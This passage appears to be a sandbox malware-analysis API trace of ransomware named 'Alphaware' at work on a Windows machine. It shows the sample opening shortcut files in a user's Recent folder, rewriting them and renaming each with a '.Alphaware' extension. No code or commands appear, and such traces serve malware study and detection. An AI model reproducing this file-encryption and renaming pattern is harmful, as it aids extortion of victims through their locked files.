lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25632e8*, lpNumberOfBytesRead=0x23e958*=0x99d, lpOverlapped=0x0) returned 1 [0098.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.094] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PPCDrQ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ppcdrq5.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.097] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PPCDrQ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ppcdrq5.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc291c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc291c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cac0740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xda0)) returned 1 [0098.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.097] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PPCDrQ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ppcdrq5.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PPCDrQ5.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ppcdrq5.lnk.alphaware")) returned 1 [0098.101] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpTfQfUJeEHeOaQm.lnk", dwFileAttributes=0x80) returned 1 [0098.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.104] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpTfQfUJeEHeOaQm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pptfqfujeeheoaqm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25e8368 | out: lpFileInformation=0x25e8368*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf3ae360, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf3ae360, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf3ae360, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3d9)) returned 1 [0098.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.104] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpTfQfUJeEHeOaQm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pptfqfujeeheoaqm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.104] ReadFile (in: hFile=0x250, lpBuffer=0x25e8a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25e8a58*, lpNumberOfBytesRead=0x23e958*=0x3d9, lpOverlapped=0x0) returned 1 [0098.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.136] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpTfQfUJeEHeOaQm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pptfqfujeeheoaqm.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.139] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpTfQfUJeEHeOaQm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pptfqfujeeheoaqm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3ae360, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf3ae360, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cb0ca00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f4)) returned 1 [0098.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.139] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpTfQfUJeEHeOaQm.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pptfqfujeeheoaqm.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PpTfQfUJeEHeOaQm.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pptfqfujeeheoaqm.lnk.alphaware")) returned 1 [0098.140] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PYDVqXrN.mkv.lnk", dwFileAttributes=0x80) returned 1 [0098.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.140] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PYDVqXrN.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pydvqxrn.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x246a030 | out: lpFileInformation=0x246a030*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfcc1740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfcc1740, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfcc1740, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x218)) returned 1 [0098.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.141] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PYDVqXrN.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pydvqxrn.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.141] ReadFile (in: hFile=0x250, lpBuffer=0x246a538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x246a538*, lpNumberOfBytesRead=0x23e958*=0x218, lpOverlapped=0x0) returned 1 [0098.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.183] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PYDVqXrN.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pydvqxrn.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PYDVqXrN.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pydvqxrn.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcc1740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfcc1740, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cb7ee20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3a0)) returned 1 [0098.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.186] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PYDVqXrN.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pydvqxrn.mkv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\PYDVqXrN.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\pydvqxrn.mkv.lnk.alphaware")) returned 1 [0098.187] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qQ69AqvCd-_gGmFEhfCj.pdf.lnk", dwFileAttributes=0x80) returned 1 [0098.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.188] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qQ69AqvCd-_gGmFEhfCj.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qq69aqvcd-_ggmfehfcj.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24eaf20 | out: lpFileInformation=0x24eaf20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1599ce0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1599ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1599ce0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa2d)) returned 1 [0098.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.188] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qQ69AqvCd-_gGmFEhfCj.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qq69aqvcd-_ggmfehfcj.pdf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.188] ReadFile (in: hFile=0x250, lpBuffer=0x24ebc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24ebc88*, lpNumberOfBytesRead=0x23e958*=0xa2d, lpOverlapped=0x0) returned 1 [0098.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.221] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qQ69AqvCd-_gGmFEhfCj.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qq69aqvcd-_ggmfehfcj.pdf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.223] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qQ69AqvCd-_gGmFEhfCj.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qq69aqvcd-_ggmfehfcj.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1599ce0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1599ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cbf1240, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe60)) returned 1 [0098.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.224] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qQ69AqvCd-_gGmFEhfCj.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qq69aqvcd-_ggmfehfcj.pdf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qQ69AqvCd-_gGmFEhfCj.pdf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qq69aqvcd-_ggmfehfcj.pdf.lnk.alphaware")) returned 1 [0098.225] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Qs1EsaM6mnJQuW3k.lnk", dwFileAttributes=0x80) returned 1 [0098.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.226] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Qs1EsaM6mnJQuW3k.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qs1esam6mnjquw3k.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25713a8 | out: lpFileInformation=0x25713a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd13aab00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13aab00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13aab00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x307)) returned 1 [0098.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.226] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Qs1EsaM6mnJQuW3k.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qs1esam6mnjquw3k.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.226] ReadFile (in: hFile=0x250, lpBuffer=0x25719a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25719a8*, lpNumberOfBytesRead=0x23e958*=0x307, lpOverlapped=0x0) returned 1 [0098.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.252] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Qs1EsaM6mnJQuW3k.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qs1esam6mnjquw3k.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.255] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Qs1EsaM6mnJQuW3k.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qs1esam6mnjquw3k.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13aab00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13aab00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cc3d500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4e0)) returned 1 [0098.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.255] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Qs1EsaM6mnJQuW3k.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qs1esam6mnjquw3k.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Qs1EsaM6mnJQuW3k.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\qs1esam6mnjquw3k.lnk.alphaware")) returned 1 [0098.256] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q_m8XgrWlwVpa_ok Jpb.lnk", dwFileAttributes=0x80) returned 1 [0098.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.257] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q_m8XgrWlwVpa_ok Jpb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\q_m8xgrwlwvpa_ok jpb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23f27f8 | out: lpFileInformation=0x23f27f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0a97720, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a97720, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a97720, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa10)) returned 1 [0098.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.257] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q_m8XgrWlwVpa_ok Jpb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\q_m8xgrwlwvpa_ok jpb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.257] ReadFile (in: hFile=0x250, lpBuffer=0x23f3538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23f3538*, lpNumberOfBytesRead=0x23e958*=0xa10, lpOverlapped=0x0) returned 1 [0098.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.281] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q_m8XgrWlwVpa_ok Jpb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\q_m8xgrwlwvpa_ok jpb.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.284] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q_m8XgrWlwVpa_ok Jpb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\q_m8xgrwlwvpa_ok jpb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a97720, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a97720, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cc897c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe48)) returned 1 [0098.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.284] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q_m8XgrWlwVpa_ok Jpb.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\q_m8xgrwlwvpa_ok jpb.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\q_m8XgrWlwVpa_ok Jpb.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\q_m8xgrwlwvpa_ok jpb.lnk.alphaware")) returned 1 [0098.286] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\r5bauI Uaurz 0kBPe.lnk", dwFileAttributes=0x80) returned 1 [0098.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.286] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\r5bauI Uaurz 0kBPe.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\r5baui uaurz 0kbpe.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2479250 | out: lpFileInformation=0x2479250*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1599ce0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1599ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1599ce0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1937)) returned 1 [0098.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.286] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\r5bauI Uaurz 0kBPe.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\r5baui uaurz 0kbpe.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.287] ReadFile (in: hFile=0x250, lpBuffer=0x2479530, nNumberOfBytesToRead=0x1937, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2479530*, lpNumberOfBytesRead=0x23e958*=0x1937, lpOverlapped=0x0) returned 1 [0098.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.309] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\r5bauI Uaurz 0kBPe.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\r5baui uaurz 0kbpe.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\r5bauI Uaurz 0kBPe.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\r5baui uaurz 0kbpe.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1599ce0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1599ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ccaf920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2274)) returned 1 [0098.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.312] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\r5bauI Uaurz 0kBPe.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\r5baui uaurz 0kbpe.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\r5bauI Uaurz 0kBPe.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\r5baui uaurz 0kbpe.lnk.alphaware")) returned 1 [0098.313] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RBnxFLdoe6j5FMDq.lnk", dwFileAttributes=0x80) returned 1 [0098.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.313] 